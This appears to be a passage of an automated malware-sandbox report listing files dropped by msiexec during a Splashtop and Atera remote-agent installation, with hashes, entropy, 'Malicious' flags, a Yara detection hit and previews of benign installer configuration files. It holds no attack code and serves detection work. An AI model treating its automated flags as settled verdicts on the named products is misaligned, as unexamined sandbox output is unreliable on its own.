                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:
    [SetupDefaults]
    LangID=1033
    ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}
    TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}
    [f9]
    Function=CA_ConflictCheck
    [f6]
    Function=CA_Finished
    [f14]
    Function=CA_Init
    [f5]
    Function=CA_InstDone
    [f1]
    Function=CA_InstSSU
    [f3]
    Function=CA_InstSrvAndDrv
    [f10]
    Function=CA_PostCleanup
    [f13]
    Function=CA_PreCleanup
    [f7]
    Function=CA_PreStopProcess
    [f11]
    Function=CA_StopProcess
    [f8]
    Function=CA_UIIsMaintenance
    [f4]
    Function=CA_UninstSSU
    [f2]
    Function=CA_UninstSrvAndDrv
    [f12]
    Function=CA_UpdateSetting
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:
    COMPANY_NAME=Splashtop Inc.
    DN_AlwaysInstall=Always Install
    IDDROP_SRS_CONFLICTED=The [ProductName] installation on this computer was failed. Make sure you've uninstalled any previously installed software before installing [ProductName].
    IDPROP_EXPRESS_LAUNCH_CONDITION_ACROBAT5FOLDER=   Adobe Acrobat 5 needs to be installed for this installation to continue.
    IDPROP_EXPRESS_LAUNCH_CONDITION_ADOBEREADER10FOLDER=Adobe Reader 10 needs to be installed for this installation to continue.
    IDPROP_E
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2374
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.66619220204628
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3j9wrwgwzfy2wzcibOi2wzitw+53WgnJWwC5LDwhFTtw7NC0:2cRzfyLz9bOiLzl+53WgndphFu7Nv
                                                                                                                                                                                                                                                                                                                                  MD5:BD29ACF2C6B763E5398C71D360958C60
                                                                                                                                                                                                                                                                                                                                  SHA1:86FD0E905AF254E6209EC6F1888E7EBAE248D977
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B90C8121D1D91FF3CF07A56F5E5FBC12DCCF9B09AE90984E171CFBF1F9E69CE
                                                                                                                                                                                                                                                                                                                                  SHA-512:1042B3344BBB482CC8C31936D5368B9B81F5BDC5335F81BCE49367F09514C13D427A05E04137EBFE0F18C7F99D8CAF6E4742DC3A6881D88004251A49DA896EFA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<Description Default="en">..<en Default="US">..<US>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. A computer with the Splashtop Remote Desktop Server can receive connections from any device running Splashtop Remote Client...</US>..</en>..<de Default="DE">..<DE>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. Ein Computer mit dem Splashtop Remote Desktop Server kann Verbindungen von jedem Ger.t empfangen, auf dem der Splashtop Remote Client l.uft...</DE>..</de>..<es Default="ES">..<ES>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. Un equipo con Splashtop Remote Desktop Server puede recibir conexiones desde cualquier dispositivo que est. ejecutando Splashtop Remote Client...</ES>..</es>..<fr Default="FR">..<FR>..Splashtop &lt;sup&gt;.&lt;/sup&gt; Remote Streamer for Microsoft Windows. Un ordinateur avec Splashtop Remote Desktop Server peut recevoir des co
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [REGPATH]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1493
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.601665610962739
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Zem6aTKNVASoBz09LAjUeiKbd8fusQK5oqAeEVhqY0+c8Eo/VoijXOR+7G2eHNhD:gPoh0dBeNbMoqvEV0Y0+bjjXD7FwNUQ
                                                                                                                                                                                                                                                                                                                                  MD5:5A9302AEA54E2C4341F2254E8E914271
                                                                                                                                                                                                                                                                                                                                  SHA1:DBD0D914EBAEF52B16E17092CC7DCCC31517797F
                                                                                                                                                                                                                                                                                                                                  SHA-256:F68C1CDA9475717430B6A3F0656085F8FB72CD3CAA66D048DE84F17CA7BE582E
                                                                                                                                                                                                                                                                                                                                  SHA-512:11552F3B66510AE76F715DB99F2A75A9D891DFA490E417C1230BBDFEDF348717FB143E773ABFA42BC3A109CCE6B3C1EBDE7ADA5E2103DB17D2B194398F6EE272
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[CUSTOMSETTING]..REGEXTSECT=Splashtop Remote Server for Business..INSTDRV=0x81..BASEDTYPE=1....[REGPATH]..NUM=2..REGPATH_01=Splashtop Remote Server..REGPATH_02=Splashtop Remote Server for Business....;Common..[REGISTRY]..CSRSMode=1..EnableNvFBC=0....;STE..[REGISTRY_Splashtop Remote Server for Business]..EnableAutoUpgrade=0..CloudUserAgent=@SX:business..EnableIQSV=0..USERTRACK_NAME=@SO:SCRS00....[PREVERCHECK]..PRODUCTID={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..PRODUCTNAME=Splashtop Streamer..SSUNAME=PROTOIRIS00..SSUPRODUCT=SVR..COMPATIBLE_NUM=4....[PREVERCHECKREG]..REGKEYPATH_NUM=2..REGKEYPATH_MAIN=0..REGKEYPATH_0=Splashtop Remote Server,1..REGKEYPATH_1=Splashtop Remote Server for Business,0....;ST2..[COMPATIBLE_0]..PRODUCTID={2EFEAD58-3311-4B2B-9D8A-8D663581D109}..UPGRADEID={001F085C-058A-480B-AD56-2940B857C38D}..SSUNAME=PROTOIRIS00..FORCESTEMODE=0....;S4B Prodcut name with Splashtop Streamer for Business..[COMPATIBLE_1]..PRODUCTID={73A1
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..C.O.M.P.A.N.Y._.N.A.M.E.=.S.p.l.a.s.h.t.o.p. .I.n.c.......D.N._.A.l.w.a.y.s.I.n.s.t.a.l.l.=.A.l.w.a.y.s. .I.n.s.t.a.l.l.....I.D.D.R.O.P._.S.R.S._.C.O.N.F.L.I.C.T.E.D.=.T.h.e. .[.P.r.o.d.u.c.t.N.a.m.e.]. .i.n.s.t.a.l.l.a.t.i.o.n. .o.n. .t.h.i.s. .c.o.m.p.u.t.e.r. .w.a.s. .f.a.i.l.e.d... .M.a.k.e. .s.u.r.e. .y.o.u.'.v.e. .u.n.i.n.s.t.a.l.l.e.d. .a.n.y. .p.r.e.v.i.o.u.s.l.y. .i.n.s.t.a.l.l.e.d. .s.o.f.t.w.a.r.e. .b.e.f.o.r.e. .i.n.s.t.a.l.l.i.n.g. .[.P.r.o.d.u.c.t.N.a.m.e.].......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.C.R.O.B.A.T.5.F.O.L.D.E.R.=. . . .A.d.o.b.e. .A.c.r.o.b.a.t. .5. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.D.O.B.E.R.E.A.D.E.R.1.0.F.O.L.D.E.R.=.A.d.o.b.e. .R.e.a.d.e.r. .1.0. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2532785006839884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ggduksNveFXJNT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:JdVlT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:D056A4E0BE5F23AFFDD317786ED981BE
                                                                                                                                                                                                                                                                                                                                  SHA1:B13A67B14F3DFDEE3BC37BDEE81CE2450BB5A61E
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC030C812D19ECBFD7CC292E955B78638A158F04318C00BE299ACBB4DAF13C4F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5E1D5F9DA64F0042BF2E969882D82B289BD03C898280927E0EE673B3BFE49EB284D3328016750A50933DC815A0F76219C66128E982DF2CB9DCD218C22C0DB9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF070AB763D94BC4D6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07818414976654083
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOw6PKLIUgVky6lW:2F0i8n0itFzDHFw6CbW
                                                                                                                                                                                                                                                                                                                                  MD5:66A8243D5CED8CF9148F8DC9CC546A50
                                                                                                                                                                                                                                                                                                                                  SHA1:215EFA5036A53267D45365E39F2A13005CC139AA
